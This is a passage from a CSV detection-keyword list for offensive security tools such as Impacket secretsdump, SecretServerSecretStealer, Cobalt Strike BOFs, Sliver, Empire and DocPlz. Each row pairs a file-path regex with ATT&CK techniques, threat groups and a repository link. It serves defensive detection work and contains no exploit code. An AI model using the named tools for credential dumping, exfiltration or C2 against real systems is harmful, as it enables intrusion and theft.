- T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - 
Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/apokryptein/secinject","1","1","N/A","N/A","10","10","94","23","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z","10766" "*/SecondaryLogonVariant.exe*",".{0,1000}\/SecondaryLogonVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","10767" "*/SecretFinder.git*",".{0,1000}\/SecretFinder\.git.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","10768" "*/secretsdump.exe*",".{0,1000}\/secretsdump\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10769" "*/secretsdump.py*",".{0,1000}\/secretsdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","10770" "*/secretsdump.py*",".{0,1000}\/secretsdump\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","10771" "*/secretsdump.py*",".{0,1000}\/secretsdump\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","10772" "*/secretsdump_*.txt*",".{0,1000}\/secretsdump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","10773" "*/SecretServerSecretStealer.git*",".{0,1000}\/SecretServerSecretStealer\.git.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","10774" "*/SecretServerSecretStealer-master.zip*",".{0,1000}\/SecretServerSecretStealer\-master\.zip.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","10775" "*/secretsmanagerenum.py*",".{0,1000}\/secretsmanagerenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","10776" "*/SecretStealer.ps1*",".{0,1000}\/SecretStealer\.ps1.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","1","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","10777" "*/SecScanC2.git*",".{0,1000}\/SecScanC2\.git.{0,1000}","offensive_tool_keyword","SecScanC2","SecScanC2 can manage assetment to create P2P 
network for security scanning & C2. The tool can assist security researchers in conducting penetration testing more efficiently - preventing scanning from being blocked - protecting themselves from being traced.","T1021 - T1090","TA0011 - TA0002 - TA0040 - TA0043","N/A","N/A","C2","https://github.com/T1esh0u/SecScanC2","1","1","#P2P","N/A","10","","N/A","","","","10778" "*/sec-tools/litefuzz*",".{0,1000}\/sec\-tools\/litefuzz.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tool","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","10779" "*/SeeYouCM-Thief*",".{0,1000}\/SeeYouCM\-Thief.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","N/A","9","2","189","35","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z","10780" "*/self_delete.cna*",".{0,1000}\/self_delete\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","N/A","10","10","180","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z","10781" "*/self_deletion.exe*",".{0,1000}\/self_deletion\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","10782" "*/SeManageVolumeExploit.git*",".{0,1000}\/SeManageVolumeExploit\.git.{0,1000}","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","N/A","10","2","110","17","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z","10783" "*/SeriousSam.sln*",".{0,1000}\/SeriousSam\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","10785" "*/server/c2/*",".{0,1000}\/server\/c2\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black 
Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","10786" "*/server/common/stagers.py*",".{0,1000}\/server\/common\/stagers\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","10787" "*/ServerC2.cpp*",".{0,1000}\/ServerC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data 
Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","10788" "*/ServerC2.exe*",".{0,1000}\/ServerC2\.exe.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","10789" "*/ServerlessRedirector.git*",".{0,1000}\/ServerlessRedirector\.git.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","N/A","N/A","10","1","72","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z","10790" "*/servers/dns_server.py*",".{0,1000}\/servers\/dns_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","10791" "*/servers/icmp_server.py*",".{0,1000}\/servers\/icmp_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","10792" 
"*/servers/smb_server.py*",".{0,1000}\/servers\/smb_server\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","10793" "*/serverscan/CobaltStrike*",".{0,1000}\/serverscan\/CobaltStrike.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard 
Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","10794" "*/serverscan_Air*",".{0,1000}\/serverscan_Air.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","10795" "*/serverscan_pro*",".{0,1000}\/serverscan_pro.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","10796" 
"*/ServerScanForLinux/*",".{0,1000}\/ServerScanForLinux\/.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","#linux","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","10797" "*/ServerScanForWindows/*",".{0,1000}\/ServerScanForWindows\/.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 
- T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","N/A","10","10","1595","221","2024-06-16T13:41:34Z","2020-04-03T15:14:12Z","10798" "*/ServerScanForWindows/PE*",".{0,1000}\/ServerScanForWindows\/PE.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
